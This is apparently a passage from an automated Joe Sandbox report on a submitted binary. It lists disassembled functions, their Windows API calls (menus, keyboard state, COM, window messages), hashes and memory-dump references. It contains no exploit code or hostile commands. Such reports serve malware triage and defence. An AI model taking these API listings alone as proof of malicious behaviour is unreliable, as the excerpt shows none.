                                                                                                                      • Opcode Fuzzy Hash: e8ee122a91f8c6e6bed8987948b2f2d04864d350257293c58183b40f9fc40cd0
                                                                                                                      • Instruction Fuzzy Hash: CF410CB280416CAADB22EB51DC45EDE73BCAB08310F1041E6F519E6091EB35AFD4DFA4
                                                                                                                      Function 0040B14A Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0040B204
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InvalidateRect
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 634782764-2594219639
                                                                                                                      • Opcode ID: bf34756a81357f0d3c960a9d1519e8c4d343f5043f5c3d622a9567902f3eef55
                                                                                                                      • Instruction ID: 789d7ac175fd893666f3a3469ded4d02a42e4afbfd25deb83a949d5284edc45c
                                                                                                                      • Opcode Fuzzy Hash: bf34756a81357f0d3c960a9d1519e8c4d343f5043f5c3d622a9567902f3eef55
                                                                                                                      • Instruction Fuzzy Hash: 2751B130600204BEEB309B288C89B9E7B65EB02354F204137F955FA2E1C779ED408BDD
                                                                                                                      Function 003BA599 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0041E9EA
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0041EA0B
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0041EA20
                                                                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0041EA3D
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0041EA64
                                                                                                                      • DestroyCursor.USER32(00000000), ref: 0041EA6F
                                                                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0041EA8C
                                                                                                                      • DestroyCursor.USER32(00000000), ref: 0041EA97
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3992029641-2594219639
                                                                                                                      • Opcode ID: a93678d12c766eb5299de0bcc7021b5fb08d20f2abf9e5c5ada6b30fba249427
                                                                                                                      • Instruction ID: 6eb357262bc5892e535af550dfadd9455e2f9a72b73c6d61eb134c9689267521
                                                                                                                      • Opcode Fuzzy Hash: a93678d12c766eb5299de0bcc7021b5fb08d20f2abf9e5c5ada6b30fba249427
                                                                                                                      • Instruction Fuzzy Hash: 6951AC74A00A05AFDB21DF25CC81FEA77F8BF08354F140229FA469B690D7B4ED809B55
                                                                                                                      Function 003A84A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __swprintf.LIBCMT ref: 003A84E5
                                                                                                                      • __itow.LIBCMT ref: 003A8519
                                                                                                                        • Part of subcall function 003C2177: _xtow@16.LIBCMT ref: 003C2198
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __itow__swprintf_xtow@16
                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                      • API String ID: 1502193981-2263619337
                                                                                                                      • Opcode ID: b3e5f8228e5e4556cf67ee10b7405839c73c78b0dc1e439b551cdc9db597611e
                                                                                                                      • Instruction ID: 836562e10f04e5853d099b4a8296ccb1fa4cb593001cfee26c1e992643e9bef7
                                                                                                                      • Opcode Fuzzy Hash: b3e5f8228e5e4556cf67ee10b7405839c73c78b0dc1e439b551cdc9db597611e
                                                                                                                      • Instruction Fuzzy Hash: E6410471900605EBDB26DF38D841FAAB7E9FF49310F24446FE549CA282EA359E81DB14
                                                                                                                      Function 003DC6FD Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003DC782
                                                                                                                      • GetDlgCtrlID.USER32 ref: 003DC78D
                                                                                                                      • GetParent.USER32 ref: 003DC7A9
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 003DC7AC
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 003DC7B5
                                                                                                                      • GetParent.USER32(?), ref: 003DC7D1
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 003DC7D4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                      • String ID: @U=u$ComboBox$ListBox
                                                                                                                      • API String ID: 313823418-2258501812
                                                                                                                      • Opcode ID: 3de186d2427b87a3d04f8ae64af2298385981829649c5fbae29b1046fba0c9d1
                                                                                                                      • Instruction ID: 8236ed72d500c84ec8e5bcbfb7daa4771678e5c73f99553cf4d2b2360804c994
                                                                                                                      • Opcode Fuzzy Hash: 3de186d2427b87a3d04f8ae64af2298385981829649c5fbae29b1046fba0c9d1
                                                                                                                      • Instruction Fuzzy Hash: D321C175A10208AFCF06EB60DC95EBEBB69EB46310F500116F522972D1DB785816EB60
                                                                                                                      Function 003DC7E6 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 80windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003DC869
                                                                                                                      • GetDlgCtrlID.USER32 ref: 003DC874
                                                                                                                      • GetParent.USER32 ref: 003DC890
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 003DC893
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 003DC89C
                                                                                                                      • GetParent.USER32(?), ref: 003DC8B8
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 003DC8BB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                      • String ID: @U=u$ComboBox$ListBox
                                                                                                                      • API String ID: 313823418-2258501812
                                                                                                                      • Opcode ID: b063c055bd2e401659373c5f567ce089d81df3f177dc4a9d03c59d75c1d189fb
                                                                                                                      • Instruction ID: 530e87fa97513274c9639b3f6eb875a3e7a83c348f6ade3c468f49cfee3145bb
                                                                                                                      • Opcode Fuzzy Hash: b063c055bd2e401659373c5f567ce089d81df3f177dc4a9d03c59d75c1d189fb
                                                                                                                      • Instruction Fuzzy Hash: 3721B376E10208BBDF02AB64DC85EFEBBB9EF45300F500116F511E7291DB78591AEB60
                                                                                                                      Function 003DC8CD Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 71windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32 ref: 003DC8D9
                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 003DC8EE
                                                                                                                      • _wcscmp.LIBCMT ref: 003DC900
                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003DC97B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                      • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                      • API String ID: 1704125052-1428604138
                                                                                                                      • Opcode ID: b9d427b678706b38c5dec45f47abcf99e8e5ddd0b0635a9f56b366287e4c3d72
                                                                                                                      • Instruction ID: 1d1b537b89820693410b844c4ae764746015b67be45765c3b05b00168ad7833d
                                                                                                                      • Opcode Fuzzy Hash: b9d427b678706b38c5dec45f47abcf99e8e5ddd0b0635a9f56b366287e4c3d72
                                                                                                                      • Instruction Fuzzy Hash: 3D11A777668303B9F6162A30AC16EA6779C9B07760B200027F900E91D3FBB57D029658
                                                                                                                      Function 003E57FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 003E5816
                                                                                                                      • GetMenuItemInfoW.USER32(004618F0,000000FF,00000000,00000030), ref: 003E5877
                                                                                                                      • SetMenuItemInfoW.USER32(004618F0,00000004,00000000,00000030), ref: 003E58AD
                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 003E58BF
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 003E5903
                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 003E591F
                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 003E5949
                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 003E598E
                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003E59D4
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003E59E8
                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003E5A09
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4176008265-0
                                                                                                                      • Opcode ID: 2ab1fae484f9065489edfd3eca1b9e9cf7827ab34010caa26c99cd263c39f674
                                                                                                                      • Instruction ID: 255fac8b21e771c523fd65285690a20a4f592f1614b85b471ef80d368c6d3d5e
                                                                                                                      • Opcode Fuzzy Hash: 2ab1fae484f9065489edfd3eca1b9e9cf7827ab34010caa26c99cd263c39f674
                                                                                                                      • Instruction Fuzzy Hash: 7961B2B0A006E9EFDF12CF65C984AEE7BB8EB0131CF150269F541A7291D770AD41CB21
                                                                                                                      Function 00409A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00409AA5
                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00409AA8
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00409ACC
                                                                                                                      • _memset.LIBCMT ref: 00409ADD
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00409AEF
                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00409B67
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 830647256-0
                                                                                                                      • Opcode ID: 9e5bc206289d925035b95455f8108da26a881dc520d9797d99c9dc98c670080a
                                                                                                                      • Instruction ID: 8da661a9f1b5a7e0fc94a544e9e151a71c6ac68a5c85aadcb2895d19d228aacb
                                                                                                                      • Opcode Fuzzy Hash: 9e5bc206289d925035b95455f8108da26a881dc520d9797d99c9dc98c670080a
                                                                                                                      • Instruction Fuzzy Hash: 70617B75A00208AFDB11DFA4CC81EEE77B8AB49710F14016AFA14A72E2D774AD45DB94
                                                                                                                      Function 003E3569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 003E3591
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 003E3612
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 003E362D
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 003E3647
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 003E365C
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 003E3674
                                                                                                                      • GetKeyState.USER32(00000011), ref: 003E3686
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 003E369E
                                                                                                                      • GetKeyState.USER32(00000012), ref: 003E36B0
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 003E36C8
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 003E36DA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: 61ec40b520ed4af70849dd2e1ff6463d37624e3f5771f64747d9b13a0de1859d
                                                                                                                      • Instruction ID: de3e8d5d3ceeb6e73d5db8191d7f2bfaeb872c190ada46c27ad80f504323e946
                                                                                                                      • Opcode Fuzzy Hash: 61ec40b520ed4af70849dd2e1ff6463d37624e3f5771f64747d9b13a0de1859d
                                                                                                                      • Instruction Fuzzy Hash: 24410530A047D97DFF328B76884C3A5BEA06B12344F458259D5C2473C2EBE49BC8CB66
                                                                                                                      Function 003DA28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003DA2AA
                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 003DA2F5
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003DA307
                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 003DA327
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 003DA36A
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 003DA37E
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003DA393
                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 003DA3A0
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003DA3A9
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003DA3BB
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003DA3C6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2706829360-0
                                                                                                                      • Opcode ID: 05d0f55b65ebae0a4a3981aae24f10b9cf50046e7c39c36e5efc1daa7c57d67c
                                                                                                                      • Instruction ID: f374c6f65e5fc87777019c63db90607984c470afd5fbd6bf6cf55c90c302a3a7
                                                                                                                      • Opcode Fuzzy Hash: 05d0f55b65ebae0a4a3981aae24f10b9cf50046e7c39c36e5efc1daa7c57d67c
                                                                                                                      • Instruction Fuzzy Hash: 4F415F35E00219AFCB12EFA4DD849DEBBB9FF48304F508065F501A7261DB34EA46CBA1
                                                                                                                      Function 003FB250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                      • CoInitialize.OLE32 ref: 003FB298
                                                                                                                      • CoUninitialize.COMBASE ref: 003FB2A3
                                                                                                                      • CoCreateInstance.COMBASE(?,00000000,00000017,0042D8FC,?), ref: 003FB303
                                                                                                                      • IIDFromString.COMBASE(?,?), ref: 003FB376
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 003FB410
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 003FB471
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                      • API String ID: 834269672-1287834457
                                                                                                                      • Opcode ID: 9115908c100ea25acc3c8728a678b8b06284a26aaeb6e9aaf76db10cd28ed6ff
                                                                                                                      • Instruction ID: ad7889c2a2e4517e1e8033a4661b907892b19797e4f92d0d9dcb58d74950e094
                                                                                                                      • Opcode Fuzzy Hash: 9115908c100ea25acc3c8728a678b8b06284a26aaeb6e9aaf76db10cd28ed6ff
                                                                                                                      • Instruction Fuzzy Hash: 5061CCB1604315AFC312DF54C984B6EF7E8AF88714F10081AFA859B291CB70ED48CB92
                                                                                                                      Function 003BC24A Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 185windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 003BC2D2
                                                                                                                        • Part of subcall function 003BC697: GetClientRect.USER32(?,?), ref: 003BC6C0
                                                                                                                        • Part of subcall function 003BC697: GetWindowRect.USER32(?,?), ref: 003BC701
                                                                                                                        • Part of subcall function 003BC697: ScreenToClient.USER32(?,?), ref: 003BC729
                                                                                                                      • GetDC.USER32 ref: 0041E006
                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041E019
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041E027
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041E03C
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0041E044
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0041E0CF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
